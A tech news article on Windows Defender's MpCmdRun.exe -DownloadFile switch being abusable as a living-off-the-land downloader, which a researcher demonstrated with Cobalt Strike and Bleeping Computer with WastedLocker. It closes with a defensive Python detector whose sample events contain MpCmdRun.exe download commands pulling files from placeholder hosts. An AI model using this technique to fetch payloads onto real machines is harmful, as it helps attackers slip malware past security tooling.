Windows 10's built-in antivirus, Windows Defender, has gained a new capability with a recent update: its command-line tool can now download files from the internet, which opens a path for pulling down malware such as spyware, trojans and ransomware.
We do not suggest that this update was designed for downloading malware; rather, any new feature can be abused once it exists.
The upside is that the average computer user has little to worry about; the concern is mainly for those who use their computers in more advanced ways.
Mohammed Asker (via Bleeping Computer), a penetration tester and an instructor who has posted several security articles on Udemy, commented on this recent feature.
On Twitter, he stated that Windows Defender itself can be used to download files from the internet.
He explained that he could use the binary MpCmdRun.exe, the Microsoft Malware Protection Command Line utility, to fetch a Cobalt Strike Beacon.
This allows an attacker to use Defender as a so-called living-off-the-land binary (LOLBin): legitimate software abused for malicious purposes, in this case an antivirus program downloading a virus.
The capability has been available for nearly two months, since it was added to Defender in the July 4.18.2007.8 update.
Bleeping Computer tested the new download switch in the command-line tool and was able to download the very WastedLocker ransomware that recently disrupted Garmin's infrastructure.
Reports indicate that the attack led the company to pay a multi-million dollar ransom.
This is not a major cause for concern, as Defender still scans files downloaded through this method.
In theory it should still protect against malware, and a local user would be needed to trigger the download.
Even so, system administrators should take note and apply appropriate safeguards.
It is not unusual for an employee to go rogue, whether out of resentment over a situation at the company, the threat of dismissal, or other reasons.
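As an added example (not code from the article, from Bleeping Computer or from Microsoft), the following Python script shows the kind of check an administrator or SOC could run over process-creation telemetry to spot Defender's command-line tool being used as a downloader. It flags MpCmdRun.exe invocations whose command line carries the -DownloadFile switch and reports the requesting user, parent process, source URL and destination path. The event records are constructed for the example in the shape of Sysmon Event ID 1 fields; the -DownloadFile, -url and -path argument names come from the tool's documented usage rather than from the article, and the hosts and paths are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed process-creation events shaped like Sysmon Event ID 1 fields
# (Image, CommandLine, ParentImage, User). None of these come from a real host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # routine scan launched by the service: benign, should not be flagged
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
        "CommandLine": '"MpCmdRun.exe" -Scan -ScanType 1',
        "ParentImage": r"C:\Windows\System32\services.exe",
        "User": "NT AUTHORITY\\SYSTEM",
    },
    {   # interactive user driving the download switch from cmd.exe: flag it
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
        "CommandLine": (
            '"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2007.8-0\\MpCmdRun.exe" '
            "-DownloadFile -url http://files.example.invalid/sample.bin "
            r"-path C:\Users\alice\Downloads\sample.bin"
        ),
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": "CORP\\alice",
    },
    {   # signature update: benign
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
        "CommandLine": '"MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": r"C:\Windows\System32\services.exe",
        "User": "NT AUTHORITY\\SYSTEM",
    },
    {   # same switch in different letter case from PowerShell: still flagged
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
        "CommandLine": (
            "mpcmdrun.exe -downloadfile -url https://updates.example.invalid/tool.exe "
            r"-path C:\Temp\tool.exe"
        ),
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "User": "CORP\\bob",
    },
]

# Case-insensitive matches for the download switch and its two arguments.
# Only the dash form of the switch is matched here (an assumption of this example).
DOWNLOAD_FLAG = re.compile(r"(?<!\S)-DownloadFile(?!\S)", re.IGNORECASE)
URL_ARG = re.compile(r"(?<!\S)-url\s+(\S+)", re.IGNORECASE)
PATH_ARG = re.compile(r"(?<!\S)-path\s+(\S+)", re.IGNORECASE)


@dataclass
class Finding:
    user: str      # account that launched MpCmdRun.exe
    parent: str    # parent process image, e.g. cmd.exe or powershell.exe
    url: str       # source URL passed to -url ("?" if absent)
    dest: str      # destination path passed to -path ("?" if absent)


def is_mpcmdrun(image: str) -> bool:
    """True when the image file name is MpCmdRun.exe, whatever the directory."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "mpcmdrun.exe"


def detect_defender_download(events: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per MpCmdRun.exe process whose command line uses -DownloadFile."""
    findings: List[Finding] = []
    for ev in events:
        if not is_mpcmdrun(ev.get("Image", "")):
            continue
        cmd = ev.get("CommandLine", "")
        if not DOWNLOAD_FLAG.search(cmd):
            continue
        url = URL_ARG.search(cmd)
        dest = PATH_ARG.search(cmd)
        findings.append(Finding(
            user=ev.get("User", "?"),
            parent=ev.get("ParentImage", "?"),
            url=url.group(1) if url else "?",
            dest=dest.group(1) if dest else "?",
        ))
    return findings


if __name__ == "__main__":
    for f in detect_defender_download(SAMPLE_EVENTS):
        print(f"MpCmdRun.exe download by {f.user} (parent {f.parent}): {f.url} -> {f.dest}")
```

The User and ParentImage fields are what make the alert actionable: the article notes that a local user has to trigger the download, so a hit that shows an interactive account and a shell parent rather than the Defender service is the case an administrator would want to review, and the destination path tells them where Defender's own scan of the downloaded file will have run.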